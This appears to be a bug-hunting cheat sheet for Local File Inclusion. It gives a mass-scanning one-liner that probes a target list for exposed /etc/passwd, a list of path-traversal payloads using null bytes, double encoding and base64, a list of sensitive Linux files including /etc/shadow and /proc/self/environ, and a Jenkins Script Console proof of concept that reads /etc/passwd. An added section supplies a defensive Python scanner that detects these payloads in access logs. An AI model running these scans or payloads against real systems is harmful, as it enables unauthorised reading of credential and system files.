👑Find LFI (CWE-98)

One-Liner for LFI 👍

cat target.txt | (gau || hakrawler || waybackurls || katana) |  grep "=" |  dedupe | httpx -silent -paths <your_wordlist>.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"
/etc/passwd
//etc//passwd
/etc/passwd%00
L2V0Yy9wYXNzd2Q=
../../../etc/passwd%00.png
../../../../../etc/passwd
....//....//....//etc/passwd
/var/www/images/../../../etc/passwd
/****/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd

Local files for Linux:

/etc/passwd
/etc/shadow
/etc/shells
/etc/group
/etc/profile
/etc/hosts
/proc/self/environ
/proc/self/status
/proc/mounts
/bin/sh
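
A defender's view of the payload variants and file list above, as an added example that is not part of the original page: a Python check that normalises query-parameter values from access-log lines (repeated URL-decoding, null-byte truncation, slash collapsing, base64 unwrapping) and flags traversal sequences or the listed files. The log lines, function names and reason labels are constructed for illustration.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Targets from the page's Linux file list, matched after normalisation.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/etc/shells", "/etc/group", "/etc/profile",
             "/etc/hosts", "/proc/self/environ", "/proc/self/status", "/proc/mounts", "/bin/sh")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SAMPLE_LOG = [  # constructed access-log lines for this example, not real traffic
    '203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /view?page=about HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2025:10:00:02 +0000] "GET /view?page=....//....//....//etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.7 - - [01/Jan/2025:10:00:04 +0000] "GET /view?page=/****/.%252e/.%252e/etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.7 - - [01/Jan/2025:10:00:06 +0000] "GET /img?file=../../../etc/passwd%00.png HTTP/1.1" 200 1843',
    '203.0.113.7 - - [01/Jan/2025:10:00:08 +0000] "GET /view?page=L2V0Yy9wYXNzd2Q= HTTP/1.1" 200 1843',
]

def canon(value):
    """Cut at a null byte, unify separators, collapse // so //etc//passwd compares equal."""
    return re.sub(r"/{2,}", "/", value.split("\x00", 1)[0].replace("\\", "/"))

def reasons(value):
    """Return the set of reasons a raw parameter value looks like an LFI probe."""
    for _ in range(5):  # repeated decoding unwraps %252e -> %2e -> .
        value, previous = unquote(value), value
        if value == previous:
            break
    found = {"null-byte"} if "\x00" in value else set()
    candidates = [(set(), canon(value))]
    if re.fullmatch(r"[A-Za-z0-9+/]{8,}={0,2}", value) and len(value) % 4 == 0:
        try:  # the value may be a base64-wrapped path such as L2V0Yy9wYXNzd2Q=
            candidates.append(({"base64"}, canon(base64.b64decode(value).decode("ascii"))))
        except ValueError:  # bad padding or non-ASCII bytes: not a wrapped path
            pass
    for label, text in candidates:
        hit = {"traversal"} if re.search(r"(^|/)\.{2,}/", text) else set()
        if any(name in text for name in SENSITIVE):
            hit.add("sensitive-file")
        if hit:
            found |= hit | label
    return found

def scan(log_lines):
    """Return (parameter, raw value, sorted reasons) for each suspicious query parameter."""
    pairs = [p.partition("=") for t in REQUEST.findall("\n".join(log_lines))
             for p in urlsplit(t).query.split("&")]
    return [(name, raw, sorted(reasons(raw))) for name, _, raw in pairs if reasons(raw)]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A 200 response to a flagged request whose body matches the one-liner's `root:[x*]:0:0:` pattern is the case to escalate first.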

If you have access to a Jenkins dashboard, use the Script Console command below as a PoC:

def passwdFile = new File("/etc/passwd")

println passwdFile.text
